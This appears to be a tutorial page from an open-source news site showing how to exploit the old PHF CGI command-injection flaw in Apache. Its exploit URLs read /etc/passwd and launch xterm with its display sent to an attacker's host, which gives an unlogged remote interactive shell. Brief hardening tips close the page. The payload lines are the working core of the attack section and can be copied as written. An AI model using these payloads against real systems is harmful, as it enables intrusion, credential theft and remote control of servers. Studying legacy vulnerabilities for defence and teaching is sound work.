Open Source Forge - www.osforge.com :: Join our freedom! :-:

Root
Contribute News
Learning Corner
Linux Distributions
Linux Common FAQ's
Discussion Forums
Community Gallery
Links Directory
Search OSForge

Networking
Industry Updates
Linux & Open Source
Opinions
Press Release
Programming
Security
Web Development
White Paper

Likewise Cross-Platform Integration Software Hits 100,000 Users

Cloud.com Releases New Version of CloudStack

CeBIT 2011: Zarafa Sets New European Open Source Groupware Standard

Open-Xchange Partners to Bring Cloud-Based E-mail Integration with Salesforce.com

Dell Customers Use Ubuntu to Deploy Cloud

London's Design Museum Recognizes Ubuntu Fonts

Canonical announces Ubuntu Developer Day

Capgemini Enters into an Alliance with Six Open Source Vendors

Liferay Releases LESA to Enterprise Customers

Zarafa Announces SiMKo 2 Support and a New S/MIME WebAccess Plugin

View More �

Back Channeling using Xterm

[Printable Version]

Intoduction
An attacker can get a shell if if you just only have a single service running on the server at port 80 i.e. HTTPD. Now, In this scenario a single vulnerability in the server that allows an attacker to execute a command is sufficient for an intelligent hacker to gain interactive shell access.
Lets say if the target server is running a script called PHF or any other script or program that allows an attacker to execute commands. So, in this tutorial we are considering that the target server is running PHF script that used to come default with the older versions of Apache web server, and UNIX X Windows system. X is a windowing facility that allows many different programs to share a graphical display which is extremely robust and allows X based client programs to display their output to the local X server or to a remote X server running on ports 6000-6003.

Preparing for the attack
Now, in this scenario the attacker would take the advantage of the PHF exploit and one of the most useful X client to attackers called xterm. Xterm is an utility which is used to start a local command shell while running X. However, by enabling the -display option, the attacker can direct a command line shell to the attacker's X server.
Before we move further you might want to take a look at PHF exploit. In order to execute a command on the server the attacker would request for a URL using his browser at port 80 to the target server that looks something like:

http://target's.i.p.address/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

Lets take a closer look at above URL. The URL would execute the command 'cat /etc/passwd' on the remote web server and display the contents of /etc/passwd file to the attacker. Additionally, %20 is used at the place of spaces as %20 is the hex value of space.

Executing the attack
Now, the attacker needs to execute the command '/usr/X11R6/bin/xterm -ut -display evil.attacker's.i.p:0.0' by requesting for the following URL:

http://target's.i.p.address/cgi-bin/phf?Qalias=x%0a/usr/X11R6/bin/xterm%20-ut%20-display%20evil.attacker's.i.p:0.0

After the exploit has been executed successfully the remote web server will simply execute the xterm with -display and -ut option enabled and display it back to the attacker's X server with the window id of 0 and screen id of 0. The activity will not be logged by the system as -ut option was enabled. Voila! The attacker has now gained interactive shell access and total control over the system.

Additional security tips
However, the protection against such attacks is extremely difficult. So, the best way is to make your self secure by removing unnecessary programs and services. You can increase your security and protect against such attacks by removing X from your system. Due to the vulnerabilities in X binaries, local users may also escalate their privileges to root besides shovelling xterm to remote attacker.

[ Back to Networking & S | Sections Index ]


About \| Term of Use \| Privacy \| Adras \| Tell a Friend \| Advertise	OSForge News RSS Feed